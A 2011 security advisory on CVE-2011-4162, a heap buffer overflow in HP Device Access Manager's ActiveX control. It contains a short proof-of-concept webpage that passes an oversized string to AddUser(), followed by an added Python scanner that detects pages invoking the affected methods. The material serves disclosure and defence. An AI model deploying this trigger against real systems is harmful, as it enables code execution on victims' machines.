Buffer Overflow in HP Device Access Manager for Protect Tools Information Store

2011-08-26T00:00:00
ID HTB23044
Type htbridge
Reporter High-Tech Bridge
Modified 2011-12-02T00:00:00

Description

High-Tech Bridge SA Security Research Lab has discovered vulnerabilities in HP Device Access Manager for Protect Tools Information Store which could be exploited to compromise a vulnerable system.

1) Buffer overflow in HP Device Access Manager for Protect Tools Information Store: CVE-2011-4162
The vulnerability exists due to an error in the Device Access Manager ActiveX Control (PTDMInformationStore.dll) while handling the AddUser(), AddUserEx(), RemoveUser(), RemoveUserByGuide(), RemoveUserEx() and RemoveUserRegardless() methods. A remote attacker can create a specially crafted webpage, cause a heap-based buffer overflow and execute arbitrary code on the target system with the privileges of the current user.

Exploitation example:
<HTML>
<BODY>
  <object id="target" classid="clsid:{1A6F1F9C-7986-4CAB-BD5E-0E0BC09DEE8B}"></object>
  <SCRIPT language="JavaScript">
    function Do_It()
    {
      arg1=String(1044, "X")
      target.AddUser arg1
    }
  </SCRIPT>
  <input onclick="Do_It()" type="button" value="P0c">
</BODY>
</HTML>
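
Detection example (added here; not part of the original advisory or High-Tech Bridge's code): a content-inspection check, such as a web proxy or mail gateway might run, that flags HTML which loads the control by the CLSID given above and calls one of the affected methods on it. The names ControlFinder, scan_html and SAMPLE are hypothetical, the sample page is constructed, and only the static `<object>` pattern shown in the advisory is covered.

```python
import re
from html.parser import HTMLParser

# CLSID and method names are taken from the advisory text.
CLSID = "1A6F1F9C-7986-4CAB-BD5E-0E0BC09DEE8B"
METHODS = ("AddUser", "AddUserEx", "RemoveUser", "RemoveUserByGuide",
           "RemoveUserEx", "RemoveUserRegardless")

class ControlFinder(HTMLParser):
    """Collects ids of <object> tags loading the control, and all script text."""
    def __init__(self):
        super().__init__()
        self.ids, self.scripts, self.in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "object" and CLSID in a.get("classid", "").upper():
            self.ids.append(a.get("id", ""))
        if tag == "script":
            self.in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts.append(data)

def scan_html(html):
    """Return (finding, detail) tuples for one HTML document (hypothetical helper)."""
    finder = ControlFinder()
    finder.feed(html)
    finder.close()
    findings = [("control-instantiated", i or "<no id>") for i in finder.ids]
    names = "|".join(re.escape(i) for i in finder.ids if i)
    if names:
        # Match <object id>.<affected method> in script text, case-insensitively.
        call = re.compile(r"\b(%s)\s*\.\s*(%s)\b" % (names, "|".join(METHODS)), re.I)
        for m in call.finditer("".join(finder.scripts)):
            findings.append(("affected-method-call", m.group(2)))
    return findings

# Constructed sample page (not from the advisory): harmless argument, lowercase CLSID.
SAMPLE = ('<object id="dam" classid="clsid:{1a6f1f9c-7986-4cab-bd5e-0e0bc09dee8b}"></object>\n'
          '<script language="VBScript">dam.RemoveUserEx "placeholder"</script>')

if __name__ == "__main__":
    print(scan_html(SAMPLE))
```

A "control-instantiated" finding alone means the page loads the control; an "affected-method-call" finding adds that script on the page invokes one of the six methods listed in the description.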